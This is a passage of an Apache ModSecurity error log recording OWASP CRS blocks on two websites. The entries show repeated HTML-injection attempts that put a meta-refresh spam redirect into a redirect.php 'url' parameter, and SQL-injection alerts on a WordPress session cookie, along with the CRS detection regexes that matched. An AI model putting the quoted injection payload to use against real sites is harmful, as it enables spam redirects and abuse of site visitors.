/>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:29.888580 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:29.888862 2026] [security2:error] [pid 1590352:tid 1590401] [client 27.78.84.116:52499] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6wa1q0G_aXAqWauT6MQAAAIk"]
[Mon May 11 22:23:30.221885 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6wno_DFxNSZVmaX3OzQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:30.222322 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6wno_DFxNSZVmaX3OzQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:30.805704 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6wno_DFxNSZVmaX3OzQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:32.353242 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6xHo_DFxNSZVmaX3OzgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:32.353583 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6xHo_DFxNSZVmaX3OzgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:32.946752 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6xHo_DFxNSZVmaX3OzgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:33.948503 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:33.949213 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:33.949392 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:33.949503 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:33.949687 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:33.950115 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:33.950394 2026] [security2:error] [pid 1601130:tid 1601150] [client 27.78.84.116:52978] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6xXEgAO_835W6c1mVXAAAAEA"]
[Mon May 11 22:23:34.646179 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6xno_DFxNSZVmaX3O0AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:34.646473 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6xno_DFxNSZVmaX3O0AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:35.236621 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6xno_DFxNSZVmaX3O0AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:35.754906 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6x3o_DFxNSZVmaX3O0QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:35.755235 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6x3o_DFxNSZVmaX3O0QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:36.309941 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6x3o_DFxNSZVmaX3O0QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:36.530214 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6yHo_DFxNSZVmaX3O0gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:36.530514 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6yHo_DFxNSZVmaX3O0gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:36.897975 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6yHo_DFxNSZVmaX3O0gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:37.929595 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6yXo_DFxNSZVmaX3O1AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:37.929903 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6yXo_DFxNSZVmaX3O1AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:38.515013 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6yXo_DFxNSZVmaX3O1AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:38.886999 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
[Mon May 11 22:23:38.887427 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
[Mon May 11 22:23:38.887585 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
